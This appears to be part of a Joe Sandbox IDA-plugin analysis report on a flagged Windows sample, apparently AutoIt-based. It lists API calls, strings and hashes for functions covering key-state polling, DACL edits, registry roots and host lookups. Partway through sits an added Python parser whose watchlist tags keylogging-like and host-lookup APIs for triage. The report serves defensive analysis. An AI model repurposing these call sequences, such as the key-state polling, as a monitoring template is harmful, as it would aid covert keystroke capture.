                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0090BC03
                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0090BC46
                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0090BC7D
                              • FreeLibrary.KERNEL32(?), ref: 0090BC89
                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0090BC99
                              • DestroyIcon.USER32(?), ref: 0090BCA8
                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0090BCC5
                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0090BCD1
                                • Part of subcall function 008A313D: __wcsicmp_l.LIBCMT ref: 008A31C6
                              Strings
                              Similarity
                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                              • String ID: .dll$.exe$.icl
                              • API String ID: 1212759294-1154884017
                              APIs
                                • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                              • CharLowerBuffW.USER32(?,?), ref: 008EA636
                              • GetDriveTypeW.KERNEL32 ref: 008EA683
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008EA6CB
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008EA702
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008EA730
                                • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                              Strings
                              Similarity
                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                              • API String ID: 2698844021-4113822522
                              APIs
                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008EA47A
                              • __swprintf.LIBCMT ref: 008EA49C
                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 008EA4D9
                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 008EA4FE
                              • _memset.LIBCMT ref: 008EA51D
                              • _wcsncpy.LIBCMT ref: 008EA559
                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 008EA58E
                              • CloseHandle.KERNEL32(00000000), ref: 008EA599
                              • RemoveDirectoryW.KERNEL32(?), ref: 008EA5A2
                              • CloseHandle.KERNEL32(00000000), ref: 008EA5AC
                              Strings
                              Similarity
                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                              • String ID: :$\$\??\%s
                              • API String ID: 2733774712-3457252023
                              APIs
                              Similarity
                              • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                              • String ID:
                              • API String ID: 884005220-0
                              APIs
                              • __wsplitpath.LIBCMT ref: 008EDC7B
                              • _wcscat.LIBCMT ref: 008EDC93
                              • _wcscat.LIBCMT ref: 008EDCA5
                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008EDCBA
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008EDCCE
                              • GetFileAttributesW.KERNEL32(?), ref: 008EDCE6
                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 008EDD00
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008EDD12
                              Strings
                              Similarity
                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                              • String ID: *.*
                              • API String ID: 34673085-438819550
                              APIs
                                • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0090C4EC
                              • GetFocus.USER32 ref: 0090C4FC
                              • GetDlgCtrlID.USER32(00000000), ref: 0090C507
                              • _memset.LIBCMT ref: 0090C632
                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0090C65D
                              • GetMenuItemCount.USER32(?), ref: 0090C67D
                              • GetMenuItemID.USER32(?,00000000), ref: 0090C690
                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0090C6C4
                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0090C70C
                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0090C744
                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0090C779
                              Strings
                              Similarity
                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                              • String ID: 0
                              • API String ID: 1296962147-4108050209
                              APIs
                                • Part of subcall function 008D874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008D8766
                                • Part of subcall function 008D874A: GetLastError.KERNEL32(?,008D822A,?,?,?), ref: 008D8770
                                • Part of subcall function 008D874A: GetProcessHeap.KERNEL32(00000008,?,?,008D822A,?,?,?), ref: 008D877F
                                • Part of subcall function 008D874A: HeapAlloc.KERNEL32(00000000,?,008D822A,?,?,?), ref: 008D8786
                                • Part of subcall function 008D874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008D879D
                                • Part of subcall function 008D87E7: GetProcessHeap.KERNEL32(00000008,008D8240,00000000,00000000,?,008D8240,?), ref: 008D87F3
                                • Part of subcall function 008D87E7: HeapAlloc.KERNEL32(00000000,?,008D8240,?), ref: 008D87FA
                                • Part of subcall function 008D87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,008D8240,?), ref: 008D880B
                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008D8458
                              • _memset.LIBCMT ref: 008D846D
                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008D848C
                              • GetLengthSid.ADVAPI32(?), ref: 008D849D
                              • GetAce.ADVAPI32(?,00000000,?), ref: 008D84DA
                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008D84F6
                              • GetLengthSid.ADVAPI32(?), ref: 008D8513
                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 008D8522
                              • HeapAlloc.KERNEL32(00000000), ref: 008D8529
                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 008D854A
                              • CopySid.ADVAPI32(00000000), ref: 008D8551
                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008D8582
                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008D85A8
                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008D85BC
                              Similarity
                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                              • String ID:
                              • API String ID: 3996160137-0
                              APIs
                              • GetDC.USER32(00000000), ref: 008F76A2
                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 008F76AE
                              • CreateCompatibleDC.GDI32(?), ref: 008F76BA
                              • SelectObject.GDI32(00000000,?), ref: 008F76C7
                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 008F771B
                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 008F7757
                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 008F777B
                              • SelectObject.GDI32(00000006,?), ref: 008F7783
                              • DeleteObject.GDI32(?), ref: 008F778C
                              • DeleteDC.GDI32(00000006), ref: 008F7793
                              • ReleaseDC.USER32(00000000,?), ref: 008F779E
                              Strings
                              Similarity
                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                              • String ID: (
                              • API String ID: 2598888154-3887548279
                              APIs
                              • LoadStringW.USER32(00000066,?,00000FFF,0090FB78), ref: 008EA0FC
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                              • LoadStringW.USER32(?,?,00000FFF,?), ref: 008EA11E
                              • __swprintf.LIBCMT ref: 008EA177
                              • __swprintf.LIBCMT ref: 008EA190
                              • _wprintf.LIBCMT ref: 008EA246
                              • _wprintf.LIBCMT ref: 008EA264
                              Strings
                              Similarity
                              • API ID: LoadString__swprintf_wprintf$_memmove
                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                              • API String ID: 311963372-2391861430
                              APIs
                                • Part of subcall function 008A0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00886C6C,?,00008000), ref: 008A0BB7
                                • Part of subcall function 008848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008848A1,?,?,008837C0,?), ref: 008848CE
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00886D0D
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00886E5A
                                • Part of subcall function 008859CD: _wcscpy.LIBCMT ref: 00885A05
                                • Part of subcall function 008A387D: _iswctype.LIBCMT ref: 008A3885
                              Strings
                              Similarity
                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                              • API String ID: 537147316-1018226102
                              APIs
                              • _memset.LIBCMT ref: 008845F9
                              • GetMenuItemCount.USER32(00946890), ref: 008BD7CD
                              • GetMenuItemCount.USER32(00946890), ref: 008BD87D
                              • GetCursorPos.USER32(?), ref: 008BD8C1
                              • SetForegroundWindow.USER32(00000000), ref: 008BD8CA
                              • TrackPopupMenuEx.USER32(00946890,00000000,?,00000000,00000000,00000000), ref: 008BD8DD
                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008BD8E9
                              Similarity
                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                              • String ID:
                              • API String ID: 2751501086-0
                              • Opcode ID: 78fff7dfe5440dc9916fca5abeaceba3dccad82f0eed2bcb0308b7a4eb1306c1
                              • Instruction ID: 20216ce75b9bf57c0c30458220325eeb4aa9400ebb4996a8d6afe94998c6029b
                              • Opcode Fuzzy Hash: 78fff7dfe5440dc9916fca5abeaceba3dccad82f0eed2bcb0308b7a4eb1306c1
                              • Instruction Fuzzy Hash: 5171F27160421ABEFB209F15DC45FEABF69FB05368F200216F524EA2E1DBB16810DB95
                              APIs
                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00900038,?,?), ref: 009010BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: BuffCharUpper
                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                              • API String ID: 3964851224-909552448
                              • Opcode ID: 38d79650226896880bdb156b7a05b7899dc00572f7076fc0e915bfd81109f4d1
                              • Instruction ID: 9452302e9df7bfaedb018e49adcc7c1f2ef4e1a1dadf97f472227ae63eda6097
                              • Opcode Fuzzy Hash: 38d79650226896880bdb156b7a05b7899dc00572f7076fc0e915bfd81109f4d1
                              • Instruction Fuzzy Hash: D5418B7110424E8FDF24EF98D991AEA3768FF26300F104514EDA19B292DB34A91ACB62
                              APIs
                                • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                • Part of subcall function 00887A84: _memmove.LIBCMT ref: 00887B0D
                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008E55D2
                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 008E55E8
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008E55F9
                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 008E560B
                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 008E561C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: SendString$_memmove
                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                              • API String ID: 2279737902-1007645807
                              • Opcode ID: d81dee642bf6b60b09820581d7744b891bbb65fc1ec6a0bf2fd537d589f910e4
                              • Instruction ID: 0196e7acf03e139eed939550c14f7a1bbbbaddeabc7515ea3271d77445d05ad5
                              • Opcode Fuzzy Hash: d81dee642bf6b60b09820581d7744b891bbb65fc1ec6a0bf2fd537d589f910e4
                              • Instruction Fuzzy Hash: 5011C42056016979D724B6A6CC8ADFF7B7CFFE2F08F500429B445E20D1EE605E05CAA2
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                              • String ID: 0.0.0.0
                              • API String ID: 208665112-3771769585
                              • Opcode ID: edd88e2848c4902cccf0cd64e6010c011f6148d18dffb27b7b8ad2a84c850762
                              • Instruction ID: 3a8266d41b5c5dbf7c444f9904627165cce231752c1a40a9bdaf5f1d2c0a2561
                              • Opcode Fuzzy Hash: edd88e2848c4902cccf0cd64e6010c011f6148d18dffb27b7b8ad2a84c850762
                              • Instruction Fuzzy Hash: 2611D831908114AFDB30FB299C49EDB7BACFB42710F044175F449E6462EFB09A819652
                              APIs
                              • timeGetTime.WINMM ref: 008E521C
                                • Part of subcall function 008A0719: timeGetTime.WINMM(?,75C0B400,00890FF9), ref: 008A071D
                              • Sleep.KERNEL32(0000000A), ref: 008E5248
                              • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 008E526C
                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 008E528E
                              • SetActiveWindow.USER32 ref: 008E52AD
                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008E52BB
                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 008E52DA
                              • Sleep.KERNEL32(000000FA), ref: 008E52E5
                              • IsWindow.USER32 ref: 008E52F1
                              • EndDialog.USER32(00000000), ref: 008E5302
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                              • String ID: BUTTON
                              • API String ID: 1194449130-3405671355
                              • Opcode ID: ed942f326e221df780c2797e13cf6fa08f6f00efc2887b468799df0bb4a81297
                              • Instruction ID: c987a0e248b7787d335a58fa95170f049e1f034ac80e10348e32cef4500660b0
                              • Opcode Fuzzy Hash: ed942f326e221df780c2797e13cf6fa08f6f00efc2887b468799df0bb4a81297
                              • Instruction Fuzzy Hash: F421A47412C748AFE7105FA1EC98E267B69FB4734AF000434F501C6AB1CBA19D40AB62
                              APIs
                                • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                              • CoInitialize.OLE32(00000000), ref: 008ED855
                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008ED8E8
                              • SHGetDesktopFolder.SHELL32(?), ref: 008ED8FC
                              • CoCreateInstance.OLE32(00912D7C,00000000,00000001,0093A89C,?), ref: 008ED948
                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008ED9B7
                              • CoTaskMemFree.OLE32(?,?), ref: 008EDA0F
                              • _memset.LIBCMT ref: 008EDA4C
                              • SHBrowseForFolderW.SHELL32(?), ref: 008EDA88
                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008EDAAB
                              • CoTaskMemFree.OLE32(00000000), ref: 008EDAB2
                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 008EDAE9
                              • CoUninitialize.OLE32(00000001,00000000), ref: 008EDAEB
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                              • String ID:
                              • API String ID: 1246142700-0
                              • Opcode ID: be7f5d0d57376863facc86f1ff0f335a6d4bb971824ca2d33a2f1765b42571b5
                              • Instruction ID: 033373c0169dda28459cdca66ab8f7ba1044b58ac740a4633997216b16f2d70b
                              • Opcode Fuzzy Hash: be7f5d0d57376863facc86f1ff0f335a6d4bb971824ca2d33a2f1765b42571b5
                              • Instruction Fuzzy Hash: 7EB10D75A00219AFDB14DFA9C888DAEBBF9FF49304B048469F905EB251DB30EE45CB51
                              APIs
                              • GetKeyboardState.USER32(?), ref: 008E05A7
                              • SetKeyboardState.USER32(?), ref: 008E0612
                              • GetAsyncKeyState.USER32(000000A0), ref: 008E0632
                              • GetKeyState.USER32(000000A0), ref: 008E0649
                              • GetAsyncKeyState.USER32(000000A1), ref: 008E0678
                              • GetKeyState.USER32(000000A1), ref: 008E0689
                              • GetAsyncKeyState.USER32(00000011), ref: 008E06B5
                              • GetKeyState.USER32(00000011), ref: 008E06C3
                              • GetAsyncKeyState.USER32(00000012), ref: 008E06EC
                              • GetKeyState.USER32(00000012), ref: 008E06FA
                              • GetAsyncKeyState.USER32(0000005B), ref: 008E0723
                              • GetKeyState.USER32(0000005B), ref: 008E0731
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: State$Async$Keyboard
                              • String ID:
                              • API String ID: 541375521-0
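                              Added example, not part of the Joe Sandbox report: a Python parser for the per-function blocks in this listing (the "• Opcode ID:" / "APIs" / "• Name.MODULE(args), ref: ADDR" / "• String ID: a$b$c" layout), plus a watchlist that tags functions such as the GetAsyncKeyState/GetKeyboardState poller above and decodes the virtual-key codes it passes (0xA0, 0xA1, 0x11, 0x12, 0x5B). The WATCHLIST, its tag names and the VK_NAMES table are this example's own assumptions, not Joe Sandbox signatures; SAMPLE is constructed from three blocks copied from this page.

```python
"""Parse the per-function blocks of a Joe Sandbox IDA-plugin listing (added example)."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Matches "GetAsyncKeyState.USER32(000000A0), ref: 008E0632" and "_memset.LIBCMT ref: 008845F9".
API_RE = re.compile(r"^(?P<name>[\w@$?]+)\.(?P<module>[A-Za-z0-9_]+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})$")
SUBCALL_PREFIX = "Part of subcall function "

# Hypothetical watchlist (API name -> behaviour tag); not a Joe Sandbox signature.
WATCHLIST = {
    "GetAsyncKeyState": "keystate-polling", "GetKeyboardState": "keystate-polling",
    "SetKeyboardState": "keystate-polling", "mciSendStringW": "audio-playback",
    "gethostbyname": "host-ip-lookup", "gethostname": "host-ip-lookup",
    "SetForegroundWindow": "window-focus", "SetActiveWindow": "window-focus",
}
# Virtual-key codes that appear as GetAsyncKeyState/GetKeyState arguments on this page.
VK_NAMES = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}

# ref is the call-site address; via_subcall is the callee address for "Part of subcall" lines, else "".
ApiCall = namedtuple("ApiCall", "name module args ref via_subcall")

@dataclass
class FunctionRecord:
    opcode_id: str
    api_id: str = ""
    strings: list = field(default_factory=list)
    apis: list = field(default_factory=list)

def parse_listing(text: str) -> list:
    """Start a record at each "Opcode ID:" line; collect its APIs list, API ID and strings."""
    records, current, in_apis = [], None, False
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ")
        if line.startswith("Opcode ID:"):
            current = FunctionRecord(opcode_id=line.split(":", 1)[1].strip())
            records.append(current)
            in_apis = False
        elif current is None:
            continue
        elif line == "APIs":
            in_apis = True
        elif line in ("Strings", "Memory Dump Source"):
            in_apis = False
        elif line.startswith("API ID:"):
            current.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("String ID:"):
            value = line.split(":", 1)[1].strip()
            current.strings = value.split("$") if value else []
        elif in_apis:
            via = ""
            if line.startswith(SUBCALL_PREFIX):
                via, _, line = line[len(SUBCALL_PREFIX):].partition(": ")
            m = API_RE.match(line)
            if m:
                args = [a for a in (m["args"] or "").split(",") if a]
                current.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], via))
    return records

def tag_function(rec: FunctionRecord) -> set:
    """Tags from the APIs list, plus a substring fallback on the API ID summary, which is
    the only place the names survive when a block's APIs section is empty."""
    tags = {WATCHLIST[c.name] for c in rec.apis if c.name in WATCHLIST}
    return tags | {tag for name, tag in WATCHLIST.items() if name in rec.api_id}

def polled_keys(rec: FunctionRecord) -> list:
    """Decode the virtual-key arguments of GetAsyncKeyState/GetKeyState calls, in call order."""
    keys = []
    for c in rec.apis:
        if c.name in ("GetAsyncKeyState", "GetKeyState") and c.args and c.args[0] != "?":
            name = VK_NAMES.get(int(c.args[0], 16), "0x" + c.args[0])
            if name not in keys:
                keys.append(name)
    return keys

# Constructed sample: three blocks copied from this page, trimmed to the lines the parser reads.
SAMPLE = """\
• Opcode ID: 38d79650226896880bdb156b7a05b7899dc00572f7076fc0e915bfd81109f4d1
APIs
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,00900038,?,?), ref: 009010BC
Strings
• API ID: BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• Opcode ID: edd88e2848c4902cccf0cd64e6010c011f6148d18dffb27b7b8ad2a84c850762
APIs
• API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• Opcode ID: aae48c2ffd372018d69b25287b6dd6c260b6de24707f097b3aa3adbd9e7a054e
APIs
• GetKeyboardState.USER32(?), ref: 008E05A7
• GetAsyncKeyState.USER32(000000A0), ref: 008E0632
• GetKeyState.USER32(000000A0), ref: 008E0649
• GetAsyncKeyState.USER32(000000A1), ref: 008E0678
• GetAsyncKeyState.USER32(00000011), ref: 008E06B5
• GetAsyncKeyState.USER32(0000005B), ref: 008E0723
Memory Dump Source
• API ID: State$Async$Keyboard
• String ID:
"""
```

                              parse_listing(SAMPLE) yields three records: the registry-root function carries the ten HK* strings and no tag, the gethostbyname function has an empty APIs list and is tagged only through the API ID fallback, and the key-state function is tagged keystate-polling with VK_LSHIFT, VK_RSHIFT, VK_CONTROL and VK_LWIN decoded from its arguments. The caveat: the API ID field is a stemmed, concatenated summary (State$Async$Keyboard for the key-state function), so the substring fallback only catches lower-case CRT and Winsock names; treat a watchlist hit as a pointer to a function worth opening in the snapshot, not as a verdict.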
                              • Opcode ID: aae48c2ffd372018d69b25287b6dd6c260b6de24707f097b3aa3adbd9e7a054e
                              • Instruction ID: 615c184612666c984d685d9306af7103395d8b524629cf1f9b17ac7db80324d6
                              • Opcode Fuzzy Hash: aae48c2ffd372018d69b25287b6dd6c260b6de24707f097b3aa3adbd9e7a054e
                              • Instruction Fuzzy Hash: 1F51CB70A047C419FF35DBA588547EABFB4EF13340F08499995C2961C2D6A49BCCCF62
                              APIs
                              • GetDlgItem.USER32(?,00000001), ref: 008DC746
                              • GetWindowRect.USER32(00000000,?), ref: 008DC758
                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 008DC7B6
                              • GetDlgItem.USER32(?,00000002), ref: 008DC7C1
                              • GetWindowRect.USER32(00000000,?), ref: 008DC7D3
                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 008DC827
                              • GetDlgItem.USER32(?,000003E9), ref: 008DC835
                              • GetWindowRect.USER32(00000000,?), ref: 008DC846
                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 008DC889
                              • GetDlgItem.USER32(?,000003EA), ref: 008DC897
                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 008DC8B4
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 008DC8C1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$ItemMoveRect$Invalidate
                              • String ID:
                              • API String ID: 3096461208-0
                              • Opcode ID: 1a1fe1a0d3725c498a07189863cbf42e26cedfdc02dc440debdec74f1eda72e1
                              • Instruction ID: aa58b601442c8da2662d3927d2ceddef105db1f470d2c7770b6245350e5c14d2
                              • Opcode Fuzzy Hash: 1a1fe1a0d3725c498a07189863cbf42e26cedfdc02dc440debdec74f1eda72e1
                              • Instruction Fuzzy Hash: 47512E71B10209AFDB18CF69DD99AAEBBBAFB88311F148239F515D7290D7709E00DB50
                              APIs
                                • Part of subcall function 00881B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00882036,?,00000000,?,?,?,?,008816CB,00000000,?), ref: 00881B9A
                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008820D3
                              • KillTimer.USER32(-00000001,?,?,?,?,008816CB,00000000,?,?,00881AE2,?,?), ref: 0088216E
                              • DestroyAcceleratorTable.USER32(00000000), ref: 008BBEF6
